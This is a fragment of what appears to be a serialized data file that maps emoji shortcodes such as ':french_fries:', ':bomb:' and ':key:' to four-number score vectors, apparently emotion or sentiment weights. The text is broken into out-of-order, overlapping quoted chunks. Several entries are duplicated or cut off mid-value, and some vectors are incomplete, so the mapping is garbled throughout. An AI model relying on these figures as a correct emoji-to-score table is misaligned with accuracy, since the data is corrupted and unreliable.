0.37200000000000005,", "[0.055999999999999994, 0.149, 0.149, 0.159], \":french_fries:\": [0.16399999999999998, 0.154, 0.14, 0.177], \":soft_ice_cream:\": [0.156, 0.18100000000000002, 0.141,", "0.188, 0.149], \":folded_hands:\": [0.187, 0.17800000000000002, 0.485, 0.35100000000000003], \":musical_note:\": [0.26, 0.191, 0.341, 0.32799999999999996], \":monkey:\":", "0.175, 0.145], \":school_backpack:\": [0.127, 0.154, 0.174, 0.094], \":diamond_with_a_dot:\": [0.222, 0.179, 0.32, 0.249], \":antenna_bars:\":", "[0.281, 0.263, 0.102, 0.231], \":person_frowning:\": [0.34600000000000003, 0.374, 0.145, 0.42100000000000004], \":smiling_face:\": [0.095, 0.13, 0.245,", "0.132, 0.262, 0.177], \":hibiscus:\": [0.085, 0.218, 0.316, 0.151], \":notebook_with_decorative_cover:\": [0.139, 0.15, 0.278, 0.185],", "\":tomato:\": [0.284, 0.22, 0.294, 0.23600000000000002], \":blue_book:\": [0.156, 0.191, 0.149, 0.193], \":headphone:\": [0.16699999999999998, 0.14800000000000002,", "0.16699999999999998, 0.226], \":baseball:\": [0.14300000000000002, 0.242, 0.099, 0.369], \":honey_pot:\": [0.177, 0.18100000000000002, 0.264, 0.14300000000000002], \":credit_card:\":", "[0.142, 0.109, 0.149, 0.11], \":incoming_envelope:\": [0.24, 0.196, 0.168, 0.248], \":hot_beverage:\": [0.142, 0.2, 0.317,", "0.212], \":shortcake:\": [0.126, 0.196, 0.166, 0.08900000000000001], \":dragon_face:\": [0.198, 0.298, 0.205, 0.157], \":END_arrow:\": [0.285,", "0.191, 0.298], \":Pisces:\": [0.16899999999999998, 0.17600000000000002, 0.233, 0.239], \":soccer_ball:\": [0.147, 0.332, 0.115, 0.41100000000000003], \":Santa_Claus:\":", "0.282], \":ballot_box_with_check:\": [0.305, 0.295, 0.20600000000000002, 0.251], \":four_leaf_clover:\": [0.17, 0.16, 0.324, 0.156], \":wrapped_gift:\": [0.076,", "[0.21, 0.228, 0.128, 0.17300000000000001], \":tent:\": [0.105, 0.18899999999999997, 0.247, 0.151], \":pineapple:\": [0.11699999999999999, 0.19399999999999998, 0.133,", "0.151, 0.446], \":large_blue_diamond:\": [0.249, 0.053, 
0.23600000000000002, 0.278], \":Statue_of_Liberty:\": [0.09, 0.226, 0.113, 0.18600000000000003], \":black_medium_square:\":", "0.11800000000000001, 0.442, 0.057999999999999996], \":battery:\": [0.08199999999999999, 0.179, 0.196, 0.111], \":face_with_steam_from_nose:\": [0.39899999999999997, 0.21, 0.043, 0.22],", "[0.259, 0.38799999999999996, 0.081, 0.128], \":Japanese_secret_button:\": [0.19699999999999998, 0.2, 0.221, 0.24], \":ATM_sign:\": [0.128, 0.179, 0.135,", "0.419, 0.109, 0.257], \":chart_increasing:\": [0.22399999999999998, 0.259, 0.42700000000000005, 0.215], \":pouting_face:\": [0.46799999999999997, 0.36200000000000004, 0.07400000000000001, 0.401],", "0.159, 0.11900000000000001], \":baby:\": [0.266, 0.201, 0.457, 0.156], \":wheelchair_symbol:\": [0.18, 0.179, 0.09300000000000001, 0.264], \":Ophiuchus:\":", "0.166], \":love_letter:\": [0.13, 0.15, 0.331, 0.142], \":bomb:\": [0.22, 0.196, 0.163, 0.205], \":direct_hit:\": [0.177,", "[0.24100000000000002, 0.156, 0.111, 0.153], \":speak-no-evil_monkey:\": [0.214, 0.2, 0.081, 0.147], \":hot_springs:\": [0.21, 0.228, 0.128,", "\":clinking_beer_mugs:\": [0.096, 0.10099999999999999, 0.179, 0.132], \":smiling_face_with_sunglasses:\": [0.036000000000000004, 0.092, 0.026000000000000002, 0.09300000000000001], \":white_small_square:\": [0.276, 0.22699999999999998,", "0.17], \":cat_face:\": [0.147, 0.185, 0.19699999999999998, 0.16699999999999998], \":panda_face:\": [0.069, 0.23199999999999998, 0.091, 0.153], \":four_o’clock:\": [0.165,", "0.16899999999999998, 0.326], \":astonished_face:\": [0.348, 0.41100000000000003, 0.138, 0.327], \":grinning_squinting_face:\": [0.165, 0.21600000000000003, 0.11900000000000001, 0.188], \":white_circle:\":", "0.217], \":old_woman:\": [0.235, 0.299, 0.326, 0.27899999999999997], \":optical_disk:\": [0.22, 0.165, 0.332, 0.261], \":magnifying_glass_tilted_left:\": [0.222,", "[0.242, 0.19, 0.142, 0.14], \":hospital:\": [0.128, 0.376, 0.305, 0.184], \":zzz:\": [0.142, 0.213, 
0.41100000000000003,", "0.2, 0.317, 0.106], \":poodle:\": [0.18600000000000003, 0.21600000000000003, 0.168, 0.152], \":dress:\": [0.183, 0.16, 0.292, 0.242],", "\":pot_of_food:\": [0.18, 0.149, 0.177, 0.193], \":two_o’clock:\": [0.122, 0.35, 0.191, 0.298], \":Pisces:\": [0.16899999999999998, 0.17600000000000002,", "0.47100000000000003], \":person_tipping_hand:\": [0.361, 0.099, 0.19699999999999998, 0.11199999999999999], \":down-right_arrow:\": [0.23, 0.242, 0.10300000000000001, 0.175], \":wedding:\": [0.092,", "0.10400000000000001], \":droplet:\": [0.19899999999999998, 0.223, 0.203, 0.248], \":cat_face_with_tears_of_joy:\": [0.43799999999999994, 0.17800000000000002, 0.11599999999999999, 0.282], \":crescent_moon:\": [0.098,", "0.23], \":unlocked:\": [0.207, 0.20600000000000002, 0.17, 0.109], \":leaf_fluttering_in_wind:\": [0.231, 0.19399999999999998, 0.382, 0.139], \":closed_mailbox_with_lowered_flag:\": [0.184,", "[0.418, 0.297, 0.11900000000000001, 0.33299999999999996], \":bouquet:\": [0.09, 0.251, 0.326, 0.18100000000000002], \":page_facing_up:\": [0.196, 0.31, 0.3,", "\":seedling:\": [0.223, 0.289, 0.503, 0.16899999999999998], \":snowman_without_snow:\": [0.11900000000000001, 0.203, 0.128, 0.278], \":OK_hand:\": [0.153, 0.21,", "0.163, 0.205], \":direct_hit:\": [0.177, 0.213, 0.098, 0.09], \":anger_symbol:\": [0.316, 0.20800000000000002, 0.036000000000000004, 0.289], \":speaker_high_volume:\":", "0.161], \":watermelon:\": [0.152, 0.14300000000000002, 0.133, 0.071], \":glasses:\": [0.157, 0.17800000000000002, 0.12300000000000001, 0.149], \":face_with_medical_mask:\": [0.436,", "0.192, 0.034], \":gem_stone:\": [0.17300000000000001, 0.073, 0.5429999999999999, 0.10800000000000001], \":purple_heart:\": [0.183, 0.131, 0.341, 0.207], \":mobile_phone_off:\":", "0.128], \":Japanese_secret_button:\": [0.19699999999999998, 0.2, 0.221, 0.24], \":ATM_sign:\": [0.128, 0.179, 0.135, 0.171], \":radio_button:\": [0.218,", "0.19, 0.14400000000000002], \":weary_cat_face:\": 
[0.251, 0.27, 0.095, 0.242], \":clinking_beer_mugs:\": [0.096, 0.10099999999999999, 0.179, 0.132], \":smiling_face_with_sunglasses:\":", "[0.282, 0.221, 0.126, 0.19899999999999998], \":princess:\": [0.39799999999999996, 0.198, 0.337, 0.175], \":key:\": [0.165, 0.157, 0.239,", "\":memo:\": [0.147, 0.235, 0.26899999999999996, 0.203], \":face_with_open_mouth:\": [0.271, 0.29, 0.16, 0.295], \":double_exclamation_mark:\": [0.157, 0.125,", "0.38299999999999995, 0.215], \":graduation_cap:\": [0.162, 0.10300000000000001, 0.392, 0.126], \":inbox_tray:\": [0.205, 0.126, 0.14, 0.213], \":confounded_face:\":", "\":fuel_pump:\": [0.375, 0.161, 0.138, 0.185], \":ear_of_corn:\": [0.141, 0.156, 0.182, 0.16699999999999998], \":pot_of_food:\": [0.18, 0.149,", "\":down-right_arrow:\": [0.23, 0.242, 0.10300000000000001, 0.175], \":wedding:\": [0.092, 0.139, 0.631, 0.252], \":money_bag:\": [0.185, 0.17300000000000001,", "0.21100000000000002, 0.223, 0.335], \":hushed_face:\": [0.314, 0.355, 0.13699999999999998, 0.353], \":umbrella_with_rain_drops:\": [0.184, 0.242, 0.254, 0.37],", "[0.27899999999999997, 0.193, 0.139, 0.054000000000000006], \":doughnut:\": [0.152, 0.259, 0.136, 0.15], \":fire:\": [0.306, 0.225, 0.10300000000000001,", "0.221], \":penguin:\": [0.151, 0.188, 0.134, 0.141], \":cow_face:\": [0.142, 0.222, 0.129, 0.185], \":tiger_face:\": [0.13,", "0.136, 0.051, 0.179], \":left-right_arrow:\": [0.32899999999999996, 0.37200000000000005, 0.214, 0.335], \":smiling_cat_face_with_heart-eyes:\": [0.304, 0.1, 0.319, 0.145],", "\":radio:\": [0.187, 0.222, 0.316, 0.361], \":guitar:\": [0.14400000000000002, 0.125, 0.257, 0.304], \":pig_face:\": [0.179, 0.214,", "\":high_voltage:\": [0.252, 0.244, 0.147, 0.228], \":banana:\": [0.21899999999999997, 0.29600000000000004, 0.184, 0.086], \":thumbs_down:\": [0.442, 0.465,", "0.17600000000000002], \":koala:\": [0.11900000000000001, 0.217, 0.11599999999999999, 0.109], \":paperclip:\": [0.289, 0.21899999999999997, 0.19399999999999998, 0.231], 
\":outbox_tray:\": [0.204,", "0.12300000000000001], \":tear-off_calendar:\": [0.139, 0.267, 0.095, 0.299], \":closed_mailbox_with_raised_flag:\": [0.191, 0.10800000000000001, 0.09699999999999999, 0.136], \":sun:\": [0.11,", "0.27399999999999997], \":american_football:\": [0.185, 0.21, 0.165, 0.354], \":bank:\": [0.23600000000000002, 0.284, 0.23800000000000002, 0.233], \":baby_angel:\": [0.20600000000000002,", "0.102], \":blowfish:\": [0.21, 0.214, 0.155, 0.138], \":bear_face:\": [0.205, 0.256, 0.129, 0.196], \":keycap_10:\": [0.217,", "0.20800000000000002, 0.23], \":man:\": [0.243, 0.131, 0.29100000000000004, 0.098], \":ghost:\": [0.147, 0.201, 0.017, 0.10800000000000001], \":telephone_receiver:\":", "\":downcast_face_with_sweat:\": [0.321, 0.496, 0.17300000000000001, 0.447], \":custard:\": [0.16399999999999998, 0.17600000000000002, 0.158, 0.131], \":cocktail_glass:\": [0.032, 0.14300000000000002,", "0.493, 0.161, 0.27], \":green_heart:\": [0.126, 0.159, 0.373, 0.19], \":input_latin_letters:\": [0.134, 0.126, 0.166, 0.121],", "[0.141, 0.156, 0.182, 0.16699999999999998], \":pot_of_food:\": [0.18, 0.149, 0.177, 0.193], \":two_o’clock:\": [0.122, 0.35, 0.191,", "0.409, 0.25], \":relieved_face:\": [0.127, 0.182, 0.254, 0.13699999999999998], \":grimacing_face:\": [0.161, 0.32799999999999996, 0.1, 0.21100000000000002], \":lollipop:\":", "[0.254, 0.147, 0.145, 0.12300000000000001], \":tear-off_calendar:\": [0.139, 0.267, 0.095, 0.299], \":closed_mailbox_with_raised_flag:\": [0.191, 0.10800000000000001, 0.09699999999999999,", "[0.11, 0.251, 0.267, 0.18], \":rose:\": [0.129, 0.161, 0.33399999999999996, 0.19899999999999998], \":bread:\": [0.142, 0.205, 0.18100000000000002,", "0.111], \":rabbit_face:\": [0.165, 0.222, 0.217, 0.037000000000000005], \":pensive_face:\": [0.261, 0.40399999999999997, 0.145, 0.313], \":anchor:\": [0.22,", "[0.187, 0.26899999999999996, 0.122, 0.158], \":boy:\": [0.171, 0.155, 0.225, 0.159], \":open_book:\": [0.196, 0.207, 0.259,", "0.266, 0.25], 
\":sun_behind_cloud:\": [0.11199999999999999, 0.27899999999999997, 0.345, 0.252], \":balloon:\": [0.042, 0.128, 0.102, 0.077], \":family:\":", "0.168, 0.141, 0.156], \":e-mail:\": [0.26, 0.225, 0.21, 0.24], \":black_medium-small_square:\": [0.392, 0.21100000000000002, 0.18600000000000003, 0.255],", "[0.214, 0.212, 0.284, 0.196], \":meat_on_bone:\": [0.177, 0.218, 0.213, 0.106], \":round_pushpin:\": [0.16399999999999998, 0.26899999999999996, 0.14800000000000002,", "0.158, 0.131], \":cocktail_glass:\": [0.032, 0.14300000000000002, 0.146, 0.046], \":Japanese_dolls:\": [0.053, 0.14, 0.07, 0.08], \":chart_decreasing:\":", "0.16, 0.214, 0.146], \":pushpin:\": [0.299, 0.263, 0.136, 0.177], \":anguished_face:\": [0.309, 0.485, 0.14, 0.369],", "0.221, 0.126, 0.19899999999999998], \":princess:\": [0.39799999999999996, 0.198, 0.337, 0.175], \":key:\": [0.165, 0.157, 0.239, 0.11599999999999999],", "\":hourglass_done:\": [0.205, 0.305, 0.25, 0.266], \":movie_camera:\": [0.142, 0.17800000000000002, 0.233, 0.158], \":eleven_o’clock:\": [0.12300000000000001, 0.282,", "\":spiral_shell:\": [0.106, 0.301, 0.316, 0.174], \":backhand_index_pointing_right:\": [0.19699999999999998, 0.258, 0.249, 0.258], \":handbag:\": [0.099, 0.154,", "0.154], \":white_flower:\": [0.187, 0.141, 0.19, 0.14400000000000002], \":weary_cat_face:\": [0.251, 0.27, 0.095, 0.242], \":clinking_beer_mugs:\": [0.096,", "0.248, 0.305, 0.20800000000000002], \":satellite_antenna:\": [0.204, 0.259, 0.303, 0.27], \":mobile_phone:\": [0.127, 0.26899999999999996, 0.172, 0.309],", "[0.272, 0.10800000000000001, 0.273, 0.16699999999999998], \":large_orange_diamond:\": [0.33, 0.21100000000000002, 0.223, 0.335], \":hushed_face:\": [0.314, 0.355, 0.13699999999999998,", "0.485, 0.14, 0.369], \":flushed_face:\": [0.281, 0.263, 0.102, 0.231], \":person_frowning:\": [0.34600000000000003, 0.374, 0.145, 0.42100000000000004],", "[0.294, 0.34700000000000003, 0.18600000000000003, 0.27899999999999997], \":woman_dancing:\": 
[0.11199999999999999, 0.11599999999999999, 0.138, 0.139], \":pager:\": [0.14400000000000002, 0.191, 0.22899999999999998,", "\":joker:\": [0.233, 0.28600000000000003, 0.051, 0.177], \":dolphin:\": [0.107, 0.184, 0.11699999999999999, 0.204], \":t-shirt:\": [0.21899999999999997, 0.078,", "0.23199999999999998, 0.16399999999999998, 0.149], \":chestnut:\": [0.212, 0.16699999999999998, 0.16899999999999998, 0.078], \":curry_rice:\": [0.161, 0.172, 0.175, 0.145],", "0.168, 0.502, 0.141], \":smiling_face_with_halo:\": [0.10800000000000001, 0.092, 0.28, 0.12300000000000001], \":smirking_face:\": [0.258, 0.040999999999999995, 0.096, 0.146],", "[0.185, 0.21, 0.165, 0.354], \":bank:\": [0.23600000000000002, 0.284, 0.23800000000000002, 0.233], \":baby_angel:\": [0.20600000000000002, 0.19699999999999998, 0.414,", "0.242, 0.099, 0.369], \":honey_pot:\": [0.177, 0.18100000000000002, 0.264, 0.14300000000000002], \":credit_card:\": [0.14400000000000002, 0.08900000000000001, 0.24100000000000002, 0.213],", "[0.17600000000000002, 0.28, 0.154, 0.22699999999999998], \":wine_glass:\": [0.046, 0.124, 0.218, 0.059000000000000004], \":octopus:\": [0.098, 0.23399999999999999, 0.19899999999999998,", "0.057999999999999996], \":face_without_mouth:\": [0.34, 0.335, 0.15, 0.359], \":blue_heart:\": [0.14800000000000002, 0.064, 0.28600000000000003, 0.281], \":Japanese_symbol_for_beginner:\": [0.222,", "0.129], \":Aries:\": [0.214, 0.212, 0.284, 0.196], \":meat_on_bone:\": [0.177, 0.218, 0.213, 0.106], \":round_pushpin:\": [0.16399999999999998,", "\":radio_button:\": [0.218, 0.209, 0.158, 0.261], \":clipboard:\": [0.157, 0.233, 0.331, 0.21100000000000002], \":persevering_face:\": [0.327, 0.516,", "0.21, 0.084], \":grinning_face_with_big_eyes:\": [0.19399999999999998, 0.177, 0.21600000000000003, 0.17], \":diamond_suit:\": [0.305, 0.17800000000000002, 0.226, 0.213], \":high-heeled_shoe:\":", "0.19, 0.149, 0.192], \":camera:\": [0.198, 0.29600000000000004, 0.287, 0.19699999999999998], 
\":small_orange_diamond:\": [0.258, 0.162, 0.23399999999999999, 0.271],", "\":french_fries:\": [0.16399999999999998, 0.154, 0.14, 0.177], \":soft_ice_cream:\": [0.156, 0.18100000000000002, 0.141, 0.09], \":Japanese_post_office:\": [0.19, 0.309,", "0.198, 0.19699999999999998, 0.10400000000000001], \":droplet:\": [0.19899999999999998, 0.223, 0.203, 0.248], \":cat_face_with_tears_of_joy:\": [0.43799999999999994, 0.17800000000000002, 0.11599999999999999, 0.282],", "0.106], \":poodle:\": [0.18600000000000003, 0.21600000000000003, 0.168, 0.152], \":dress:\": [0.183, 0.16, 0.292, 0.242], \":blond-haired_person:\": [0.257,", "[0.235, 0.299, 0.326, 0.27899999999999997], \":optical_disk:\": [0.22, 0.165, 0.332, 0.261], \":magnifying_glass_tilted_left:\": [0.222, 0.276, 0.203,", "0.276, 0.773, 0.366], \":cyclone:\": [0.16899999999999998, 0.28800000000000003, 0.177, 0.214], \":black_large_square:\": [0.396, 0.159, 0.222, 0.263],", "0.193, 0.139, 0.054000000000000006], \":doughnut:\": [0.152, 0.259, 0.136, 0.15], \":fire:\": [0.306, 0.225, 0.10300000000000001, 0.179],", "0.358, 0.22699999999999998], \":closed_umbrella:\": [0.136, 0.20199999999999999, 0.201, 0.295], \":waving_hand:\": [0.256, 0.252, 0.146, 0.19899999999999998], \":rice_cracker:\":", "0.3], \":left_arrow:\": [0.282, 0.221, 0.126, 0.19899999999999998], \":princess:\": [0.39799999999999996, 0.198, 0.337, 0.175], \":key:\": [0.165,", "0.287, 0.218], \":ferris_wheel:\": [0.092, 0.168, 0.141, 0.156], \":e-mail:\": [0.26, 0.225, 0.21, 0.24], \":black_medium-small_square:\":", "[0.264, 0.23199999999999998, 0.258, 0.282], \":ballot_box_with_check:\": [0.305, 0.295, 0.20600000000000002, 0.251], \":four_leaf_clover:\": [0.17, 0.16, 0.324,", "[0.239, 0.214, 0.16699999999999998, 0.22], \":bug:\": [0.268, 0.27, 0.174, 0.102], \":blowfish:\": [0.21, 0.214, 0.155,", "\":grinning_cat_face_with_smiling_eyes:\": [0.12, 0.161, 0.17600000000000002, 0.201], \":birthday_cake:\": [0.055, 0.185, 0.317, 0.122], \":carousel_horse:\": 
[0.11900000000000001, 0.128,", "0.21899999999999997, 0.242, 0.42700000000000005], \":seven_o’clock:\": [0.15, 0.35, 0.08900000000000001, 0.33], \":smiling_face_with_horns:\": [0.213, 0.055, 0.081, 0.193],", "[0.36200000000000004, 0.267, 0.055999999999999994, 0.218], \":pill:\": [0.195, 0.253, 0.182, 0.203], \":package:\": [0.126, 0.18600000000000003, 0.214,", "[0.203, 0.243, 0.354, 0.212], \":lady_beetle:\": [0.228, 0.22, 0.20800000000000002, 0.153], \":hatching_chick:\": [0.099, 0.171, 0.16,", "\":up_arrow:\": [0.382, 0.293, 0.21899999999999997, 0.284], \":teacup_without_handle:\": [0.156, 0.237, 0.429, 0.07], \":page_with_curl:\": [0.201, 0.294,", "0.18899999999999997], \":trumpet:\": [0.128, 0.17800000000000002, 0.20600000000000002, 0.221], \":mouth:\": [0.245, 0.136, 0.321, 0.121], \":frog_face:\": [0.408,", "0.253], \":right_arrow_curving_down:\": [0.257, 0.276, 0.287, 0.245], \":roasted_sweet_potato:\": [0.191, 0.21899999999999997, 0.25, 0.121], \":crossed_flags:\": [0.114,", "0.261], \":magnifying_glass_tilted_left:\": [0.222, 0.276, 0.203, 0.131], \":Sagittarius:\": [0.17, 0.217, 0.21, 0.22], \":fuel_pump:\": [0.375,", "\":Sagittarius:\": [0.17, 0.217, 0.21, 0.22], \":fuel_pump:\": [0.375, 0.161, 0.138, 0.185], \":ear_of_corn:\": [0.141, 0.156,", "[0.171, 0.078, 0.32299999999999995, 0.157], \":grinning_face:\": [0.163, 0.17300000000000001, 0.171, 0.18600000000000003], \":girl:\": [0.22699999999999998, 0.16, 0.214,", "0.182, 0.254, 0.13699999999999998], \":grimacing_face:\": [0.161, 0.32799999999999996, 0.1, 0.21100000000000002], \":lollipop:\": [0.092, 0.163, 0.158, 0.055],", "\":input_latin_uppercase:\": [0.182, 0.175, 0.161, 0.182], \":kitchen_knife:\": [0.321, 0.449, 0.075, 0.125], \":straight_ruler:\": [0.249, 0.20600000000000002,", "[0.392, 0.531, 0.172, 0.433], \":loudspeaker:\": [0.271, 0.19899999999999998, 0.15, 0.21600000000000003], \":convenience_store:\": [0.191, 0.17800000000000002, 0.17600000000000002,", "{ \":person_surfing:\": [0.12, 0.195, 
0.08800000000000001, 0.222], \":locked:\": [0.146, 0.141, 0.196, 0.212], \":hammer:\": [0.33299999999999996,", "0.048, 0.2], \":locked_with_pen:\": [0.168, 0.138, 0.19899999999999998, 0.12300000000000001], \":tired_face:\": [0.264, 0.376, 0.155, 0.303], \":red_apple:\":", "[0.34, 0.335, 0.15, 0.359], \":blue_heart:\": [0.14800000000000002, 0.064, 0.28600000000000003, 0.281], \":Japanese_symbol_for_beginner:\": [0.222, 0.121, 0.237,", "0.18], \":revolving_hearts:\": [0.2, 0.09699999999999999, 0.42700000000000005, 0.142], \":spaghetti:\": [0.055999999999999994, 0.149, 0.149, 0.159], \":french_fries:\": [0.16399999999999998,", "[0.179, 0.214, 0.165, 0.337], \":hamster_face:\": [0.215, 0.196, 0.305, 0.19399999999999998], \":police_officer:\": [0.34, 0.493, 0.161,", "[0.348, 0.19399999999999998, 0.155, 0.22899999999999998], \":sparkler:\": [0.10300000000000001, 0.209, 0.221, 0.20600000000000002], \":fish:\": [0.131, 0.16699999999999998, 0.147,", "0.256, 0.182], \":shooting_star:\": [0.17600000000000002, 0.16, 0.377, 0.2], \":seedling:\": [0.223, 0.289, 0.503, 0.16899999999999998], \":snowman_without_snow:\":", "0.316, 0.361], \":guitar:\": [0.14400000000000002, 0.125, 0.257, 0.304], \":pig_face:\": [0.179, 0.214, 0.165, 0.337], \":hamster_face:\":", "[0.24100000000000002, 0.221, 0.212, 0.24100000000000002], \":Japanese_congratulations_button:\": [0.158, 0.162, 0.255, 0.19899999999999998], \":waxing_gibbous_moon:\": [0.18100000000000002, 0.245, 0.327,", "\":old_woman:\": [0.235, 0.299, 0.326, 0.27899999999999997], \":optical_disk:\": [0.22, 0.165, 0.332, 0.261], \":magnifying_glass_tilted_left:\": [0.222, 0.276,", "0.172, 0.175, 0.145], \":school_backpack:\": [0.127, 0.154, 0.174, 0.094], \":diamond_with_a_dot:\": [0.222, 0.179, 0.32, 0.249],", "[0.2, 0.109, 0.134, 0.209], \":blossom:\": [0.20199999999999999, 0.299, 0.314, 0.242], \":fishing_pole:\": [0.174, 0.14800000000000002, 0.075,", "[0.183, 0.27, 0.08900000000000001, 0.135], \":cactus:\": [0.087, 0.245, 0.192, 
0.034], \":gem_stone:\": [0.17300000000000001, 0.073, 0.5429999999999999,", "[0.142, 0.213, 0.41100000000000003, 0.289], \":wrench:\": [0.25, 0.313, 0.337, 0.13699999999999998], \":hear-no-evil_monkey:\": [0.303, 0.27699999999999997, 0.094,", "0.336], \":face_with_tears_of_joy:\": [0.381, 0.231, 0.099, 0.326], \":neutral_face:\": [0.415, 0.309, 0.149, 0.322], \":ant:\": [0.26899999999999996,", "[0.147, 0.196, 0.249, 0.212], \":red_triangle_pointed_down:\": [0.304, 0.242, 0.207, 0.185], \":pine_decoration:\": [0.115, 0.271, 0.336,", "\":fire:\": [0.306, 0.225, 0.10300000000000001, 0.179], \":oden:\": [0.12300000000000001, 0.077, 0.069, 0.166], \":angry_face_with_horns:\": [0.385, 0.257,", "[0.215, 0.196, 0.305, 0.19399999999999998], \":police_officer:\": [0.34, 0.493, 0.161, 0.27], \":green_heart:\": [0.126, 0.159, 0.373,", "\":fax_machine:\": [0.24100000000000002, 0.35200000000000004, 0.16699999999999998, 0.226], \":baseball:\": [0.14300000000000002, 0.242, 0.099, 0.369], \":honey_pot:\": [0.177, 0.18100000000000002,", "0.231], \":outbox_tray:\": [0.204, 0.22899999999999998, 0.19699999999999998, 0.19399999999999998], \":woman’s_boot:\": [0.221, 0.095, 0.127, 0.239], \":syringe:\": [0.21,", "0.19699999999999998, 0.331], \":rice_ball:\": [0.10300000000000001, 0.254, 0.092, 0.262], \":memo:\": [0.147, 0.235, 0.26899999999999996, 0.203], \":face_with_open_mouth:\":", "0.19899999999999998, 0.17], \":cat_face:\": [0.147, 0.185, 0.19699999999999998, 0.16699999999999998], \":panda_face:\": [0.069, 0.23199999999999998, 0.091, 0.153], \":four_o’clock:\":", "0.142, 0.46, 0.299], \":downwards_button:\": [0.195, 0.258, 0.182, 0.225], \":twelve_o’clock:\": [0.18600000000000003, 0.34700000000000003, 0.165, 0.349],", "0.257, 0.03, 0.21100000000000002], \":kissing_face_with_smiling_eyes:\": [0.203, 0.126, 0.256, 0.138], \":woman’s_hat:\": [0.175, 0.17, 0.281, 0.151],", "0.228], \":locked_with_key:\": [0.20600000000000002, 0.095, 0.28, 0.16], \":ten_o’clock:\": [0.141, 0.304, 0.191, 
0.309], \":red_triangle_pointed_up:\": [0.321,", "\":small_orange_diamond:\": [0.258, 0.162, 0.23399999999999999, 0.271], \":map_of_Japan:\": [0.122, 0.213, 0.24100000000000002, 0.152], \":boar:\": [0.187, 0.26899999999999996,", "0.221, 0.212, 0.24100000000000002], \":Japanese_congratulations_button:\": [0.158, 0.162, 0.255, 0.19899999999999998], \":waxing_gibbous_moon:\": [0.18100000000000002, 0.245, 0.327, 0.221],", "\":clutch_bag:\": [0.12300000000000001, 0.17, 0.253, 0.31], \":hundred_points:\": [0.254, 0.147, 0.145, 0.12300000000000001], \":tear-off_calendar:\": [0.139, 0.267,", "[0.079, 0.151, 0.24, 0.247], \":briefcase:\": [0.17300000000000001, 0.192, 0.28600000000000003, 0.175], \":musical_notes:\": [0.149, 0.131, 0.326,", "[0.185, 0.289, 0.083, 0.172], \":laptop_computer:\": [0.127, 0.23399999999999999, 0.35, 0.255], \":mushroom:\": [0.188, 0.239, 0.21,", "0.11699999999999999, 0.204], \":t-shirt:\": [0.21899999999999997, 0.078, 0.11599999999999999, 0.226], \":purse:\": [0.105, 0.196, 0.302, 0.20199999999999999], \":old_man:\":", "\":chart_increasing:\": [0.22399999999999998, 0.259, 0.42700000000000005, 0.215], \":pouting_face:\": [0.46799999999999997, 0.36200000000000004, 0.07400000000000001, 0.401], \":fish_cake_with_swirl:\": [0.10800000000000001, 0.21600000000000003,", "0.23800000000000002, 0.233], \":baby_angel:\": [0.20600000000000002, 0.19699999999999998, 0.414, 0.371], \":bar_chart:\": [0.213, 0.255, 0.41, 0.228], \":locked_with_key:\":", "[0.171, 0.209, 0.11800000000000001, 0.39799999999999996], \":pig_nose:\": [0.212, 0.188, 0.16699999999999998, 0.392], \":Scorpio:\": [0.185, 0.218, 0.302,", "0.258, 0.249, 0.258], \":handbag:\": [0.099, 0.154, 0.223, 0.293], \":Libra:\": [0.14400000000000002, 0.193, 0.275, 0.161],", "0.078, 0.126, 0.285], \":pile_of_poo:\": [0.35, 0.342, 0.151, 0.446], \":large_blue_diamond:\": [0.249, 0.053, 0.23600000000000002, 0.278],", "0.14400000000000002, 0.21899999999999997, 0.257], \":five_o’clock:\": [0.126, 0.335, 0.21, 
0.264], \":unamused_face:\": [0.418, 0.297, 0.11900000000000001, 0.33299999999999996],", "0.312, 0.20800000000000002], \":jack-o-lantern:\": [0.129, 0.327, 0.09, 0.092], \":wind_chime:\": [0.214, 0.17600000000000002, 0.271, 0.166], \":open_hands:\":", "0.193], \":headphone:\": [0.16699999999999998, 0.14800000000000002, 0.266, 0.316], \":crown:\": [0.33299999999999996, 0.11800000000000001, 0.268, 0.127], \":dizzy:\": [0.233,", "0.08], \":Tokyo_tower:\": [0.115, 0.092, 0.168, 0.24], \":money_with_wings:\": [0.12300000000000001, 0.096, 0.166, 0.121], \":fax_machine:\": [0.24100000000000002,", "0.248], \":wavy_dash:\": [0.235, 0.287, 0.253, 0.268], \":bowling:\": [0.07400000000000001, 0.165, 0.073, 0.275], \":oncoming_fist:\": [0.23600000000000002,", "\":mahjong_red_dragon:\": [0.171, 0.263, 0.128, 0.212], \":sushi:\": [0.134, 0.196, 0.13699999999999998, 0.214], \":two-hump_camel:\": [0.151, 0.263,", "[0.204, 0.259, 0.303, 0.27], \":mobile_phone:\": [0.127, 0.26899999999999996, 0.172, 0.309], \":white_medium-small_square:\": [0.305, 0.22699999999999998, 0.126,", "\":pig_nose:\": [0.212, 0.188, 0.16699999999999998, 0.392], \":Scorpio:\": [0.185, 0.218, 0.302, 0.27399999999999997], \":black_circle:\": [0.335, 0.212,", "0.34], \":fast-forward_button:\": [0.327, 0.322, 0.17, 0.265], \":office_building:\": [0.18100000000000002, 0.359, 0.22, 0.19], \":radio:\": [0.187,", "\":guard:\": [0.19, 0.23, 0.081, 0.17600000000000002], \":love_hotel:\": [0.040999999999999995, 0.141, 0.22899999999999998, 0.155], \":alien_monster:\": [0.128, 0.228,", "0.235], \":church:\": [0.20800000000000002, 0.276, 0.773, 0.366], \":cyclone:\": [0.16899999999999998, 0.28800000000000003, 0.177, 0.214], \":black_large_square:\": [0.396,", "[0.254, 0.16399999999999998, 0.078, 0.159], \":left_arrow_curving_right:\": [0.138, 0.275, 0.228, 0.22899999999999998], \":palm_tree:\": [0.035, 0.34299999999999997, 0.129,", "0.21, 0.22], \":fuel_pump:\": [0.375, 0.161, 0.138, 0.185], \":ear_of_corn:\": [0.141, 
